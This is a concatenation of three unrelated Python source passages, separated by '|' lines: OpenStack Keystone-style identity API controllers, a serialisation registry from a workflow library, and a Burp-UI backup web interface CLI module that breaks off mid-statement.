return ref
@staticmethod
def filter_domain_id(ref):
"""Remove domain_id since v2 calls are not domain-aware."""
ref.pop('domain_id', None)
return ref
@staticmethod
def normalize_username_in_response(ref):
"""Adds username to outgoing user refs to match the v2 spec.
Internally we use `name` to represent a user's name. The v2 spec
requires the use of `username` instead.
"""
if 'username' not in ref and 'name' in ref:
ref['username'] = ref['name']
return ref
@staticmethod
def normalize_username_in_request(ref):
"""Adds name in incoming user refs to match the v2 spec.
Internally we use `name` to represent a user's name. The v2 spec
requires the use of `username` instead.
"""
if 'name' not in ref and 'username' in ref:
ref['name'] = ref.pop('username')
return ref
@staticmethod
def v3_to_v2_user(ref):
"""Convert a user_ref from v3 to v2 compatible.
* v2.0 users are not domain aware, and should have domain_id removed
* v2.0 users expect the use of tenantId instead of default_project_id
* v2.0 users have a username attribute
This method should only be applied to user_refs being returned from the
v2.0 controller(s).
If ref is a list type, we will iterate through each element and do the
conversion.
"""
def _format_default_project_id(ref):
"""Convert default_project_id to tenantId for v2 calls."""
default_project_id = ref.pop('default_project_id', None)
if default_project_id is not None:
ref['tenantId'] = default_project_id
elif 'tenantId' in ref:
# NOTE(morganfainberg): To avoid v2.0 confusion if somehow a
# tenantId property sneaks its way into the extra blob on the
# user, we remove it here. If default_project_id is set, we
# would override it in either case.
del ref['tenantId']
def _normalize_and_filter_user_properties(ref):
"""Run through the various filter/normalization methods."""
_format_default_project_id(ref)
V2Controller.filter_domain_id(ref)
V2Controller.normalize_username_in_response(ref)
return ref
if isinstance(ref, dict):
return _normalize_and_filter_user_properties(ref)
elif isinstance(ref, list):
return [_normalize_and_filter_user_properties(x) for x in ref]
else:
raise ValueError(_('Expected dict or list: %s') % type(ref))
@dependency.requires('policy_api', 'token_provider_api')
class V3Controller(wsgi.Application):
"""Base controller class for Identity API v3.
Child classes should set the ``collection_name`` and ``member_name`` class
attributes, representing the collection of entities they are exposing to
the API. This is required for supporting self-referential links,
pagination, etc.
Class parameters:
* `_mutable_parameters` - set of parameters that can be changed by users.
Usually used by cls.check_immutable_params()
* `_public_parameters` - set of parameters that are exposed to the user.
Usually used by cls.filter_params()
"""
collection_name = 'entities'
member_name = 'entity'
get_member_from_driver = None
@classmethod
def base_url(cls, context, path=None):
endpoint = super(V3Controller, cls).base_url(context, 'public')
if not path:
path = cls.collection_name
return '%s/%s/%s' % (endpoint, 'v3', path.lstrip('/'))
@classmethod
def full_url(cls, context, path=None):
url = cls.base_url(context, path)
if context['environment'].get('QUERY_STRING'):
url = '%s?%s' % (url, context['environment']['QUERY_STRING'])
return url
@classmethod
def query_filter_is_true(cls, filter_value):
"""Determine if bool query param is 'True'.
We treat this the same way as we do for policy
enforcement:
{bool_param}=0 is treated as False
Any other value is considered to be equivalent to
True, including the absence of a value
"""
if (isinstance(filter_value, six.string_types) and
filter_value == '0'):
val = False
else:
val = True
return val
@classmethod
def _add_self_referential_link(cls, context, ref):
ref.setdefault('links', {})
ref['links']['self'] = cls.base_url(context) + '/' + ref['id']
@classmethod
def wrap_member(cls, context, ref):
cls._add_self_referential_link(context, ref)
return {cls.member_name: ref}
@classmethod
def wrap_collection(cls, context, refs, hints=None):
"""Wrap a collection, checking for filtering and pagination.
Returns the wrapped collection, which includes:
- Executing any filtering not already carried out
- Truncate to a set limit if necessary
- Adds 'self' links in every member
- Adds 'next', 'self' and 'prev' links for the whole collection.
:param context: the current context, containing the original url path
and query string
:param refs: the list of members of the collection
:param hints: list hints, containing any relevant filters and limit.
Any filters already satisfied by managers will have been
removed
"""
# Check if there are any filters in hints that were not
# handled by the drivers. The driver will not have paginated or
# limited the output if it found there were filters it was unable to
# handle.
if hints is not None:
refs = cls.filter_by_attributes(refs, hints)
list_limited, refs = cls.limit(refs, hints)
for ref in refs:
cls.wrap_member(context, ref)
container = {cls.collection_name: refs}
container['links'] = {
'next': None,
'self': cls.full_url(context, path=context['path']),
'previous': None}
if list_limited:
container['truncated'] = True
return container
@classmethod
def limit(cls, refs, hints):
"""Limits a list of entities.
The underlying driver layer may have already truncated the collection
for us, but in case it was unable to handle truncation we check here.
:param refs: the list of members of the collection
:param hints: hints, containing, among other things, the limit
requested
:returns: boolean indicating whether the list was truncated, as well
as the list of (truncated if necessary) entities.
"""
NOT_LIMITED = False
LIMITED = True
if hints is None or hints.limit is None:
# No truncation was requested
return NOT_LIMITED, refs
if hints.limit.get('truncated', False):
# The driver did truncate the list
return LIMITED, refs
if len(refs) > hints.limit['limit']:
# The driver layer wasn't able to truncate it for us, so we must
# do it here
return LIMITED, refs[:hints.limit['limit']]
return NOT_LIMITED, refs
@classmethod
def filter_by_attributes(cls, refs, hints):
"""Filters a list of references by filter values."""
def _attr_match(ref_attr, val_attr):
"""Matches attributes allowing for booleans as strings.
We test explicitly for a value that defines it as 'False',
which also means that the existence of the attribute with
no value implies 'True'
"""
if type(ref_attr) is bool:
return ref_attr == utils.attr_as_boolean(val_attr)
else:
return ref_attr == val_attr
def _inexact_attr_match(filter, ref):
"""Applies an inexact filter to a result dict.
:param filter: the filter in question
:param ref: the dict to check
:returns True if there is a match
"""
comparator = filter['comparator']
key = filter['name']
if key in ref:
filter_value = filter['value']
target_value = ref[key]
if not target_value:
# NOTE(garcianavalon) prevent exceptions!
return False
if not filter['case_sensitive']:
# We only support inexact filters on strings so
# it's OK to use lower()
filter_value = filter_value.lower()
target_value = target_value.lower()
if comparator == 'contains':
return (filter_value in target_value)
elif comparator == 'startswith':
return target_value.startswith(filter_value)
elif comparator == 'endswith':
return target_value.endswith(filter_value)
else:
# We silently ignore unsupported filters
return True
return False
for filter in hints.filters:
if filter['comparator'] == 'equals':
attr = filter['name']
value = filter['value']
refs = [r for r in refs if _attr_match(
utils.flatten_dict(r).get(attr), value)]
else:
# It might be an inexact filter
refs = [r for r in refs if _inexact_attr_match(
filter, r)]
return refs
@classmethod
def build_driver_hints(cls, context, supported_filters):
"""Build list hints based on the context query string.
:param context: contains the query_string from which any list hints can
be extracted
:param supported_filters: list of filters supported, so ignore any
keys in query_dict that are not in this list.
"""
query_dict = context['query_string']
hints = driver_hints.Hints()
if query_dict is None:
return hints
for key in query_dict:
# Check if this is an exact filter
if supported_filters is None or key in supported_filters:
hints.add_filter(key, query_dict[key])
continue
# Check if it is an inexact filter
for valid_key in supported_filters:
# See if this entry in query_dict matches a known key with an
# inexact suffix added. If it doesn't match, then that just
# means that there is no inexact filter for that key in this
# query.
if not key.startswith(valid_key + '__'):
continue
base_key, comparator = key.split('__', 1)
# We map the query-style inexact of, for example:
#
# {'email__contains', 'myISP'}
#
# into a list directive add filter call parameters of:
#
# name = 'email'
# value = 'myISP'
# comparator = 'contains'
# case_sensitive = True
case_sensitive = True
if comparator.startswith('i'):
case_sensitive = False
comparator = comparator[1:]
hints.add_filter(base_key, query_dict[key],
comparator=comparator,
case_sensitive=case_sensitive)
# NOTE(henry-nash): If we were to support pagination, we would pull any
# pagination directives out of the query_dict here, and add them into
# the hints list.
return hints
def _require_matching_id(self, value, ref):
"""Ensures the value matches the reference's ID, if any."""
if 'id' in ref and ref['id'] != value:
raise exception.ValidationError('Cannot change ID')
def _require_matching_domain_id(self, ref_id, ref, get_member):
"""Ensure the current domain ID matches the reference one, if any.
Provided we want domain IDs to be immutable, check whether any
domain_id specified in the ref dictionary matches the existing
domain_id for this entity.
:param ref_id: the ID of the entity
:param ref: the dictionary of new values proposed for this entity
:param get_member: The member function to call to get the current
entity
:raises: :class:`keystone.exception.ValidationError`
"""
# TODO(henry-nash): It might be safer and more efficient to do this
# check in the managers affected, so look to migrate this check to
# there in the future.
if CONF.domain_id_immutable and 'domain_id' in ref:
existing_ref = get_member(ref_id)
if ref['domain_id'] != existing_ref['domain_id']:
raise exception.ValidationError(_('Cannot change Domain ID'))
def _assign_unique_id(self, ref):
"""Generates and assigns a unique identifier to a reference."""
ref = ref.copy()
ref['id'] = uuid.uuid4().hex
return ref
def _get_domain_id_for_list_request(self, context):
"""Get the domain_id for a v3 list call.
If we running with multiple domain drivers, then the caller must
specify a domain_id either as a filter or as part of the token scope.
"""
if not CONF.identity.domain_specific_drivers_enabled:
# We don't need to specify a domain ID in this case
return
if context['query_string'].get('domain_id') is not None:
return context['query_string'].get('domain_id')
try:
token_ref = token_model.KeystoneToken(
token_id=context['token_id'],
token_data=self.token_provider_api.validate_token(
context['token_id']))
except KeyError:
raise exception.ValidationError(
_('domain_id is required as part of entity'))
except (exception.TokenNotFound,
exception.UnsupportedTokenVersionException):
LOG.warning(_('Invalid token found while getting domain ID '
'for list request'))
raise exception.Unauthorized()
if token_ref.domain_scoped:
return token_ref.domain_id
else:
LOG.warning(
_('No domain information specified as part of list request'))
raise exception.Unauthorized()
def _get_domain_id_from_token(self, context):
"""Get the domain_id for a v3 create call.
In the case of a v3 create entity call that does not specify a domain
ID, the spec says that we should use the domain scoping from the token
being used.
"""
# We could make this more efficient by loading the domain_id
# into the context in the wrapper function above (since
# this version of normalize_domain will only be called inside
# a v3 protected call). However, this optimization is probably not
# worth the duplication of state
try:
token_ref = token_model.KeystoneToken(
token_id=context['token_id'],
token_data=self.token_provider_api.validate_token(
context['token_id']))
except KeyError:
# This might happen if we use the Admin token, for instance
raise exception.ValidationError(
_('A domain-scoped token must be used'))
except (exception.TokenNotFound,
exception.UnsupportedTokenVersionException):
LOG.warning(_('Invalid token found while getting domain ID '
'for list request'))
raise exception.Unauthorized()
if token_ref.domain_scoped:
return token_ref.domain_id
else:
# TODO(henry-nash): We should issue an exception here since if
# a v3 call does not explicitly specify the domain_id in the
# entity, it should be using a domain scoped token. However,
# the current tempest heat tests issue a v3 call without this.
# This is raised as bug #1283539. Once this is fixed, we
# should remove the line below and replace it with an error.
return CONF.identity.default_domain_id
def _normalize_domain_id(self, context, ref):
"""Fill in domain_id if not specified in a v3 call."""
if 'domain_id' not in ref:
ref['domain_id'] = self._get_domain_id_from_token(context)
return ref
@staticmethod
def filter_domain_id(ref):
"""Override v2 filter to let domain_id out for v3 calls."""
return ref
def check_protection(self, context, prep_info, target_attr=None):
"""Provide call protection for complex target attributes.
As well as including the standard parameters from the original API
call (which is passed in prep_info), this call will add in any
additional entities or attributes (passed in target_attr), so that
they can be referenced by policy rules.
"""
if 'is_admin' in context and context['is_admin']:
LOG.warning(_('RBAC: Bypassing authorization'))
else:
action = 'identity:%s' % prep_info['f_name']
# TODO(henry-nash) need to log the target attributes as well
creds = _build_policy_check_credentials(self, action,
context,
prep_info['input_attr'])
# Build the dict the policy engine will check against from both the
# parameters passed into the call we are protecting (which was
# stored in the prep_info by protected()), plus the target
# attributes provided.
policy_dict = {}
if target_attr:
policy_dict = {'target': target_attr}
policy_dict.update(prep_info['input_attr'])
self.policy_api.enforce(creds,
action,
utils.flatten_dict(policy_dict))
LOG.debug('RBAC: Authorization granted')
@classmethod
def check_immutable_params(cls, ref):
"""Raise exception when disallowed parameter is in ref.
Check whether the ref dictionary representing a request has only
mutable parameters included. If not, raise an exception. This method
checks only root-level keys from a ref dictionary.
:param ref: a dictionary representing deserialized request to be
stored
:raises: :class:`keystone.exception.ImmutableAttributeError`
"""
ref_keys = set(ref.keys())
blocked_keys = ref_keys.difference(cls._mutable_parameters)
if not blocked_keys:
# No immutable parameters changed
return
exception_args = {'target': cls.__name__,
'attributes': ', '.join(blocked_keys)}
raise exception.ImmutableAttributeError(**exception_args)
@classmethod
def filter_params(cls, ref):
"""Remove unspecified parameters from the dictionary.
This function removes unspecified parameters from the dictionary. See
check_immutable_parameters for corresponding function that raises
exceptions. This method checks only root-level keys from a ref
dictionary.
:param ref: a dictionary representing deserialized response to be
serialized
"""
ref_keys = set(ref.keys())
blocked_keys = ref_keys - cls._public_parameters
for blocked_param in blocked_keys:
del ref[blocked_param]
return ref
|
|
import inspect
from itertools import count
from pathlib import Path
import base64
try:
from dataclasses import is_dataclass # noqa
from .dataclass import SerDataClass
except ImportError:
def is_dataclass(x):
return False
def SerDataClass():
return None
from ..interface import (Fail, PromisedObject, Quote)
from ..lib import (object_name, look_up, importable, unwrap, is_unwrapped)
from ..workflow import (Workflow, NodeData, FunctionNode, ArgumentAddress,
ArgumentKind, reset_workflow, get_workflow)
from .registry import (Registry, Serialiser, SerUnknown)
from .reasonable import (Reasonable, SerReasonableObject)
from .path import (SerPath)
def ismethod(x):
if inspect.ismethod(x):
return True
if type(x).__name__ == 'builtin_function_or_method' \
and hasattr(x, '__self__'):
return True
return False
class SerAuto(Serialiser):
def __init__(self):
super(SerAuto, self).__init__('<automagic>')
def encode(self, obj, make_rec):
return obj.__serialize__(make_rec)
def decode(self, cls, data):
return cls.__construct__(data)
class SerByMembers(Serialiser):
def __init__(self, cls, members):
super().__init__(cls)
self.members = members
def encode(self, obj, make_rec):
return make_rec({
m: getattr(obj, m) for m in self.members
})
def decode(self, cls, data):
return cls(**data)
class SerDict(Serialiser):
def __init__(self):
super(SerDict, self).__init__(dict)
def encode(self, obj, make_rec):
return make_rec(dict(obj))
def decode(self, cls, data):
return cls(data)
class SerBytes(Serialiser):
def __init__(self):
super(SerBytes, self).__init__(bytes)
def encode(self, obj, make_rec):
return make_rec(base64.b64encode(obj).decode())
def decode(self, cls, data):
return base64.b64decode(data.encode())
class SerSequence(Serialiser):
"""Tuples get converted to lists during serialisation.
We want to get tuples back, so make this explicit."""
def __init__(self, cls):
super().__init__(cls)
def encode(self, obj, make_rec):
return make_rec(list(obj))
def decode(self, cls, data):
return cls(data)
class SerEnum(Serialiser):
def __init__(self, cls):
super(SerEnum, self).__init__(cls)
def encode(self, obj, make_rec):
return make_rec(obj.name)
def decode(self, cls, data):
return cls[data]
class SerNamedTuple(Serialiser):
def __init__(self, cls):
super(SerNamedTuple, self).__init__(cls)
def encode(self, obj, make_rec):
return make_rec(dict(obj._asdict()))
def decode(self, cls, data):
return cls(**data)
class SerSlice(Serialiser):
def __init__(self):
super(SerSlice, self).__init__(slice)
def encode(self, obj, make_rec):
return make_rec([obj.start, obj.stop, obj.step])
def decode(self, cls, data):
return slice(*data)
def _remap_links(remap, links):
return [{'node': remap[source],
'to': [{'node': remap[node],
'address': address}
for node, address in target]}
for source, target in links.items()]
class SerWorkflow(Serialiser):
def __init__(self):
super(SerWorkflow, self).__init__(Workflow)
def encode(self, obj, make_rec):
remap = dict(zip(obj.nodes.keys(), count()))
return make_rec({'root': remap[obj.root],
'nodes': list(obj.nodes.values()),
'links': _remap_links(remap, obj.links)})
def decode(self, cls, data):
root = data['root']
nodes = dict(zip(count(), data['nodes']))
links = {l['node']: {(target['node'], target['address'])
for target in l['to']}
for l in data['links']}
return reset_workflow(Workflow(root, nodes, links))
class SerPromisedObject(Serialiser):
def __init__(self):
super(SerPromisedObject, self).__init__(PromisedObject)
def encode(self, obj, make_rec):
return make_rec({'workflow': get_workflow(obj)})
def decode(self, cls, data):
return PromisedObject(data['workflow'])
class SerMethod(Serialiser):
def __init__(self):
super(SerMethod, self).__init__('<method>')
def encode(self, obj, make_rec):
return make_rec({'class': object_name(obj.__member_of__),
'method': obj.__name__})
def decode(self, cls, data):
cls = look_up(data['class'])
return unwrap(getattr(cls, data['method']))
class SerBoundMethod(Serialiser):
def __init__(self):
super(SerBoundMethod, self).__init__('<boundmethod>')
def encode(self, obj, make_rec):
return make_rec({
'self': obj.__self__,
'name': obj.__name__})
def decode(self, _, data):
return getattr(data['self'], data['name'])
class SerImportable(Serialiser):
def __init__(self):
super(SerImportable, self).__init__('<importable>')
def encode(self, obj, make_rec):
return make_rec(object_name(obj))
def decode(self, cls, data):
return look_up(data)
class SerNode(Serialiser):
def __init__(self):
super(SerNode, self).__init__(FunctionNode)
def encode(self, obj, make_rec):
return make_rec(dict(obj.data._asdict()))
def decode(self, cls, data):
return FunctionNode.from_node_data(NodeData(**data))
def _noodles_hook(obj):
if '__member_of__' in dir(obj) and obj.__member_of__:
return '<method>'
if importable(obj):
return '<importable>'
if ismethod(obj):
return '<boundmethod>'
if is_unwrapped(obj):
return '<unwrapped>'
if hasattr(obj, '__serialize__') and hasattr(type(obj), '__construct__'):
return '<automagic>'
if is_dataclass(type(obj)) and not isinstance(obj, type):
return '<dataclass>'
return None
class SerUnwrapped(Serialiser):
def __init__(self):
return super().__init__('<unwrapped>')
def encode(self, obj, make_rec):
return make_rec(object_name(obj))
def decode(self, cls, data):
return unwrap(look_up(data))
def registry():
"""Returns the Noodles base serialisation registry."""
return Registry(
types={
dict: SerDict(),
tuple: SerSequence(tuple),
set: SerSequence(set),
bytes: SerBytes(),
slice: SerSlice(),
complex: SerByMembers(complex, ['real', 'imag']),
Reasonable: SerReasonableObject(Reasonable),
ArgumentKind: SerEnum(ArgumentKind),
FunctionNode: SerNode(),
ArgumentAddress: SerNamedTuple(ArgumentAddress),
Workflow: SerWorkflow(),
PromisedObject: SerPromisedObject(),
Quote: SerReasonableObject(Quote),
Path: SerPath(),
Fail: SerReasonableObject(Fail)
},
hooks={
'<method>': SerMethod(),
'<boundmethod>': SerBoundMethod(),
'<importable>': SerImportable(),
'<automagic>': SerAuto(),
'<unwrapped>': SerUnwrapped(),
'<dataclass>': SerDataClass()
},
hook_fn=_noodles_hook,
default=SerUnknown(),
)
|
|
# -*- coding: utf8 -*-
"""
Burp-UI is a web-ui for burp backup written in python with Flask and
jQuery/Bootstrap
.. module:: burpui.cli
:platform: Unix
:synopsis: Burp-UI CLI module.
.. moduleauthor:: Ziirish <[email protected]>
"""
import os
import sys
import time
import click
if os.getenv("BUI_MODE") in ["server", "ws"] or "websocket" in sys.argv:
try:
from gevent import monkey
monkey.patch_socket()
except ImportError:
pass
from .app import create_app # noqa
from .exceptions import BUIserverException # noqa
try:
from flask_socketio import SocketIO # noqa
WS_AVAILABLE = True
except ImportError:
WS_AVAILABLE = False
ROOT = os.path.dirname(os.path.realpath(__file__))
DEBUG = os.getenv("BUI_DEBUG") or os.getenv("FLASK_DEBUG") or False
DEBUG = DEBUG and DEBUG.lower() not in ["false", "no", "0"]
VERBOSE = os.getenv("BUI_VERBOSE") or 0
if VERBOSE:
try:
VERBOSE = int(VERBOSE)
except ValueError:
VERBOSE = 0
# UNITTEST is used to skip the burp-2 requirements for modes != server
UNITTEST = os.getenv("BUI_MODE") not in ["server", "manage", "celery", "legacy", "ws"]
CLI = os.getenv("BUI_MODE") not in ["server", "legacy"]
app = create_app(
conf=os.environ.get("BUI_CONFIG"),
verbose=VERBOSE,
logfile=os.environ.get("BUI_LOGFILE"),
debug=DEBUG,
gunicorn=False,
unittest=UNITTEST,
cli=CLI,
websocket_server=(os.getenv("BUI_MODE") == "ws" or "websocket" in sys.argv),
)
try:
from .extensions import create_db
from .ext.sql import db
from flask_migrate import Migrate
# This may have been reseted by create_app
if isinstance(app.database, bool):
app.config["WITH_SQL"] = app.database
else:
app.config["WITH_SQL"] = app.database and app.database.lower() != "none"
if app.config["WITH_SQL"]:
create_db(app, True)
mig_dir = os.getenv("BUI_MIGRATIONS")
if mig_dir:
migrate = Migrate(app, db, mig_dir)
else:
migrate = Migrate(app, db)
except ImportError:
pass
# Utilities functions
def _die(error, appli=None):
appli = " '{}'".format(appli) if appli else ""
err(
"Unable to initialize the application{}: {}".format(appli, error),
)
sys.exit(2)
def _log(message, *args, color=None, err=False):
msg = message % args if args else message
if color is not None:
msg = click.style(msg, fg=color)
click.echo(msg, err=err)
def log(message="", *args):
_log(message, *args)
def ok(message="", *args):
_log(message, *args, color="green")
def info(message="", *args):
_log(message, *args, color="blue")
def warn(message="", *args):
_log(message, *args, color="yellow")
def err(message="", *args, err=True):
_log(message, *args, color="red", err=err)
@app.cli.command()
def legacy():
"""Legacy server for backward compatibility."""
warn(
"If you want to pass options, you should run 'python -m burpui "
"-m legacy [...]' instead",
)
app.manual_run()
@app.cli.command()
@click.option(
"-b",
"--bind",
default="127.0.0.1",
help="Which address to bind to for the websocket server",
)
@click.option(
"-p",
"--port",
default=5001,
help="Which port to listen on for the websocket server",
)
@click.option(
"-d",
"--debug",
default=False,
is_flag=True,
help="Whether to start the websocket server in debug mode",
)
def websocket(bind, port, debug):
"""Start a new websocket server."""
try:
from .ext.ws import socketio
except ImportError:
_die(
"Missing requirement, did you ran 'pip install" ' "burp-ui[websocket]"\'?',
"websocket",
)
socketio.run(app, host=bind, port=port, debug=debug)
@app.cli.command()
@click.option(
"-b", "--backend", default="BASIC", help="User Backend (default is BASIC)."
)
@click.option("-p", "--password", help="Password to assign to user.", default=None)
@click.option(
"-a",
"--ask",
default=False,
is_flag=True,
help="If no password is provided and this flag is enabled, "
"you'll be prompted for one, else a random one will be "
"generated.",
)
@click.option(
"-v", "--verbose", default=False, is_flag=True, help="Add extra debug messages."
)
@click.argument("name")
def create_user(backend, password, ask, verbose, name):
"""Create a new user."""
try:
msg = app.load_modules()
except Exception as e:
msg = str(e)
if not backend.endswith(":AUTH"):
backend = f"{backend}:AUTH"
backend = backend.upper()
if msg:
_die(msg, "create_user")
info("[*] Adding '{}' user...".format(name))
try:
handler = getattr(app, "uhandler")
except AttributeError:
handler = None
if not handler or len(handler.backends) == 0 or backend not in handler.backends:
err("[!] No authentication backend found")
sys.exit(1)
back = handler.backends[backend]
if back.add_user is False:
err("[!] The '{}' backend does not support user creation".format(backend))
sys.exit(2)
if not password:
if ask:
import getpass
password = getpass.getpass()
confirm = getpass.getpass("Confirm: ")
if password != confirm:
err("[!] Passwords mismatch")
sys.exit(3)
else:
import random
alphabet = (
"abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLM" "NOPQRSTUVWXYZ"
)
pw_length = 8
mypw = ""
for i in range(pw_length):
next_index = random.randrange(len(alphabet))
mypw += alphabet[next_index]
password = mypw
info("[+] Generated password: {}".format(password))
success, message, _ = back.add_user(name, password)
_log(
"[+] Success: {}{}".format(
success, " -> {}".format(message) if verbose and message else ""
),
color="green" if success else "red",
)
@app.cli.command()
@click.option("-p", "--password", help="Password to assign to user.", default=None)
@click.option(
"-u",
"--username",
help="Provide the username to get the full " "configuration line.",
default=None,
)
@click.option(
"-b",
"--batch",
default=False,
is_flag=True,
help="Don't be extra verbose so that you can use the output "
"directly in your scripts. Requires both -u and -p.",
)
def hash_password(password, username, batch):
"""Hash a given password to fill the configuration file."""
from werkzeug.security import generate_password_hash
if batch and (not username or not password):
err(
"You need to provide both a username and a password using the "
"-u and -p flags!",
)
sys.exit(1)
askpass = False
if not password:
askpass = True
import getpass
password = getpass.getpass()
hashed = generate_password_hash(password)
if not batch:
log("'{}' hashed into: {}".format(password if not askpass else "*" * 8, hashed))
if username:
if not batch:
info("#8<{}".format("-" * 77))
log("{} = {}".format(username, hashed))
if not batch:
info("#8<{}".format("-" * 77))
@app.cli.command()
@click.argument("language")
def init_translation(language):
"""Initialize a new translation for the given language."""
try:
import babel # noqa
except ImportError:
warn("Missing i18n requirements, giving up")
return
os.chdir(os.path.join(ROOT, ".."))
os.system(
"pybabel extract -F babel.cfg -k __ -k lazy_gettext -o messages.pot burpui"
)
os.system(
"pybabel init -i messages.pot -d burpui/translations -l {}".format(language)
)
os.unlink("messages.pot")
@app.cli.command()
def update_translation():
"""Update translation files."""
try:
import babel # noqa
except ImportError:
warn("Missing i18n requirements, giving up")
return
os.chdir(os.path.join(ROOT, ".."))
os.system(
"pybabel extract -F babel.cfg -k __ -k lazy_gettext -o messages.pot burpui"
)
os.system("pybabel update -i messages.pot -d burpui/translations")
os.unlink("messages.pot")
@app.cli.command()
def compile_translation():
"""Compile translations."""
try:
import babel # noqa
except ImportError:
warn("Missing i18n requirements, giving up")
return
os.chdir(os.path.join(ROOT, ".."))
os.system("pybabel compile -f -d burpui/translations")
@app.cli.command()
@click.option(
"-b",
"--burp-conf-cli",
"bconfcli",
default=None,
help="Burp client configuration file",
)
@click.option(
"-s",
"--burp-conf-serv",
"bconfsrv",
default=None,
help="Burp server configuration file",
)
@click.option(
"-c",
"--client",
default="bui",
help="Name of the burp client that will be used by Burp-UI " '(defaults to "bui")',
)
@click.option(
"-l",
"--listen",
default="0.0.0.0:5971",
help="Setup a custom listen port for the Burp-UI restorations",
)
@click.option(
"-h",
"--host",
default="::1",
help='Address of the status server (defaults to "::1")',
)
@click.option("-r", "--redis", default=None, help="Redis URL to connect to")
@click.option(
"-d",
"--database",
default=None,
help="Database to connect to for persistent storage",
)
@click.option("-p", "--plugins", default=None, help="Plugins location")
@click.option("-m", "--monitor", default=None, help="bui-monitor configuration file")
@click.option(
"-i", "--monitor-listen", "mbind", default=None, help="bui-monitor bind address"
)
@click.option(
"-C",
"--concurrency",
default=None,
type=click.INT,
help="Number of concurrent requests addressed to the monitor",
)
@click.option(
"-P",
"--pool-size",
"pool",
default=None,
type=click.INT,
help="Number of burp-client processes to spawn in the monitor",
)
@click.option(
"-B",
"--backend",
default=None,
help="Switch to another backend",
type=click.Choice(["burp2", "parallel"]),
)
@click.option(
"-a",
"--assume-version",
"assume",
default=None,
help="If we cannot determine server version use this one",
)
@click.option(
"-n",
"--dry",
is_flag=True,
help="Dry mode. Do not edit the files but display changes",
)
def setup_burp(
bconfcli,
bconfsrv,
client,
listen,
host,
redis,
database,
plugins,
monitor,
mbind,
concurrency,
pool,
backend,
assume,
dry,
):
"""Setup burp client for burp-ui."""
if app.config["BACKEND"] not in ["burp2", "parallel"] and not backend:
err("Sorry, you can only setup the 'burp2' and the 'parallel' backends")
sys.exit(1)
if not app.config["STANDALONE"]:
err("Sorry, only the standalone mode is supported")
sys.exit(1)
if concurrency:
from multiprocessing import cpu_count
if concurrency > cpu_count():
warn(
"Warning: setting a concurrency level higher than the available CPU"
" count might cause you some troubles"
)
if pool and concurrency:
if concurrency > pool:
warn(
"Warning: setting a concurrency level higher than the available"
" processes in the monitor is not recommended"
)
is_parallel = app.config["BACKEND"] == "parallel" or (
backend and backend == "parallel"
)
# enforce burp2 backend for the configuration
app.config["BACKEND"] = "burp2"
try:
msg = app.load_modules()
except Exception as e:
msg = str(e)
if msg:
_die(msg, "setup-burp")
from .misc.parser.utils import Config
from .misc.backend.utils.constant import BURP_LISTEN_OPTION, BURP_BIND_MULTIPLE
from .app import get_redis_server
from .config import BUIConfig
import difflib
import tempfile
if monitor:
monconf = BUIConfig(monitor)
monconf_orig = []
mon_orig = mon_source = monitor
if dry:
try:
with open(monitor) as fil:
monconf_orig = fil.readlines()
except:
pass
(_, temp) = tempfile.mkstemp()
monconf.options.filename = temp
parser = app.client.get_parser()
server_version = app.client.get_server_version() or assume
orig = source = None
conf_orig = []
if dry:
try:
with open(app.conf.options.filename) as fil:
conf_orig = fil.readlines()
except:
pass
orig = source = app.conf.options.filename
(_, temp) = tempfile.mkstemp()
app.conf.options.filename = temp
# handle migration of old config files
if app.conf.section_exists("Burp2"):
if app.conf.rename_section("Burp2", "Burp", source):
info("Renaming old [Burp2] section")
app.conf._refresh(True)
refresh = False
if not app.conf.lookup_section("Burp", source):
refresh = True
if not app.conf.lookup_section("Global", source):
refresh = True
if (database or redis) and not app.conf.lookup_section("Production", source):
refresh = True
if concurrency and not app.conf.lookup_section("Parallel", source):
refresh = True
if refresh:
app.conf._refresh(True)
if monitor and not monconf.lookup_section("Global", mon_source):
monconf._refresh(True)
def _edit_conf(key, val, attr, section="Burp", obj=app.client, conf=app.conf):
if val and (
(key not in conf.options[section])
or (key in conf.options[section] and val != conf.options[section][key])
):
adding = key not in conf.options[section]
conf.options[section][key] = val
conf.options.write()
if obj:
setattr(obj, attr, val)
if adding:
msg = f'Adding new option "{key}={val}" to section [{section}] in {conf.conffile}'
else:
msg = f'Updating option "{key}={val}" in section [{section}] in {conf.conffile}'
info(msg)
return True
return False
def _color_diff(line):
if line.startswith("+"):
return click.style(line, fg="green")
elif line.startswith("-"):
return click.style(line, fg="red")
elif line.startswith("^"):
return click.style(line, fg="blue")
return line
refresh = False
refresh |= _edit_conf("bconfcli", bconfcli, "burpconfcli")
refresh |= _edit_conf("bconfsrv", bconfsrv, "burpconfsrv")
refresh |= _edit_conf("plugins", plugins, "plugins", "Global", app)
if backend:
refresh |= _edit_conf("backend", backend, None, "Global", None)
if is_parallel and concurrency:
refresh |= _edit_conf("concurrency", concurrency, None, "Parallel", None)
if mbind:
refresh |= _edit_conf("host", mbind, None, "Parallel", None)
if refresh:
app.conf._refresh(True)
refresh = False
if monitor and pool:
refresh |= _edit_conf("pool", pool, None, "Global", None, monconf)
if monitor and mbind:
refresh |= _edit_conf("bind", mbind, None, "Global", None, monconf)
if monitor:
refresh |= _edit_conf("bconfcli", bconfcli, None, "Burp", None, monconf)
if refresh:
monconf._refresh(True)
if monitor and app.config["BACKEND"] == "parallel":
mon_password = monconf.options["Global"].get("password")
back_password = app.conf.options["Parallel"].get("password")
if mon_password != back_password:
click.echo(
click.style(
"Backend password does not match monitor password", fg="yellow"
)
)
if redis:
try:
# detect missing modules
import redis as redis_client # noqa
import celery # noqa
import socket
if (
"redis" not in app.conf.options["Production"]
or "redis" in app.conf.options["Production"]
and app.conf.options["Production"]["redis"] != redis
) and app.redis != redis:
app.conf.options["Production"]["redis"] = redis
app.redis = redis
rhost, rport, _ = get_redis_server(app)
ret = -1
for _ in range(10):
if ret == 0:
break
for res in socket.getaddrinfo(
rhost, rport, socket.AF_UNSPEC, socket.SOCK_STREAM
):
if ret == 0:
break
af, socktype, proto, _, sa = res
try:
s = socket.socket(af, socktype, proto)
except socket.error:
continue
try:
ret = s.connect_ex(sa)
except:
continue
time.sleep(1)
if ret == 0:
app.conf.options["Production"]["celery"] = "true"
app.conf.options["Production"]["storage"] = "redis"
app.conf.options["Production"]["cache"] = "redis"
else:
warn("Unable to contact the redis server, disabling it")
app.conf.options["Production"]["storage"] = "default"
app.conf.options["Production"]["cache"] = "default"
if app.use_celery:
app.conf.options["Production"]["celery"] = "false"
app.conf.options.write()
app.conf._refresh(True)
except ImportError:
warn(
